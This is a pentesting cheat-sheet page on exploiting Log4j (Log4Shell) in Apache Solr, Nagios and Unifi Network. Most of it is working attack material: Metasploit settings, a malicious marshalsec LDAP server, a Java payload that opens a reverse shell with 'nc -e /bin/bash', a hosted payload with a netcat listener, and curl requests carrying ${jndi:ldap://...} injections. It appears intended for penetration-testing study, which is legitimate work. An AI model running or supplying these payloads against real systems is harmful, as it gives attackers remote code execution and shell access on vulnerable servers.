Log4j Pentesting

OpenCATS Pentesting

PHP RCE Cheat Sheet

PHP Srand Time Abusing

PHP hash_hmac Bypass

Restaurant Management System (RMS) Pentesting

TeamCity Pentesting

Tiny File Manager Pentesting

Web Browser Settings for Pentesting

Web PHP Pentesting

WebAnno Pentesting

WebDAV Pentesting

WebSocket Pentesting

Webmin Pentesting

Log4j Pentesting

Last modified: 2023-02-14

Log4j has zero-day vulnerabilities to Log4Shell, Log4Unifi.

msfconsole
msf> use exploit/multi/http/log4shell_header_injection
msf> set HTTP_HEADER ACCEPT
msf> set RHOSTS <target-ip>
msf> set SRVHOST <local-ip>
msf> set SRVPORT 1389
# e.g. Nagios
msf> set TARGETURI /~logs
msf> set LHOST <local-ip>
msf> run
shell

Exploit Apache Solr (JNDI)

You need to prepare your four local terminals.

1. Start LDAP Server on Your Local Terminal 1

Install Maven
```
sudo apt install maven
```

Get the Payload

Download the repository.

git clone https://github.com/mbechler/marshalsec.git
cd marshalsec

Then build the marshalsec utility

mvn clean package -DskipTests

Start LDAP Server

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<your-local-ip>:8000/#Exploit"

2. Host the Exploit on Your Local Terminal 2

Create the Exploit with Java

First, create a new directory and create a new exploit named "Exploit.java" in the directory.
Open your favorite editor like vim.

mkdir exploit
cd exploit
vim Exploit.java

In editor, enter the following code.

public class Exploit {
static {
    try {
        java.lang.Runtime.getRuntime().exec("nc -e /bin/bash <your-local-ip> <your-local-listener-port>");
    } catch (Exception e) {
        e.printStackTrace();
    }
}
}

Compile the Payload

javac Exploit.java -source 8 -target 8

Start Web Server to Host the Payload

python3 -m http.server 8000

3. Open Listener on Your Local Terminal 3

nc -lvnp <your-local-listener-port>

4. Send Request the Target Website

# Apache Solr
curl 'http://<target-ip>:<target-port>/solr/admin/cores?foo=${jndi:ldap://<local-ip>:1389/Exploit}'

# Nagios
curl http://<target-ip>:<target-port>/~logs -H 'Accept: ${jndi:ldap://<local-ip>:1389/Exploit}'

Exploit Unifi Network using Log4Unifi

Log4Unifi is an exploitation Log4j tool in Unifi Network.

1. Test the Vulnerability in the Target Web Page

curl -i -s -k -X POST -H $'Host: vulnerable.com:8443' -H $'Content-Length: 104' --data-binary $'{\"username\":\"a\",\"password\":\"a\",\"remember\":\"${jndi:ldap://9ulral.dnslog.cn:1389/o=tomcat}\",\"strict\":true}' $'https://<target-ip>:8443/api/login'

2. Open Listener on Your Local Machine

nc -lvnp 4444

3. Exploit

Download the exploit from the repository.

git clone https://github.com/puzzlepeaches/Log4jUnifi
cd Log4Unifi

Exploit

python exploit.py -u https://<target-ip>:8443 -i <your-local-ip> -p 4444

Method

Security Risk

Cookie

CMS

Framework

Template Engine

API

Cloud

Microsoft

Tool

Others

Log4j Pentesting

ON THIS PAGE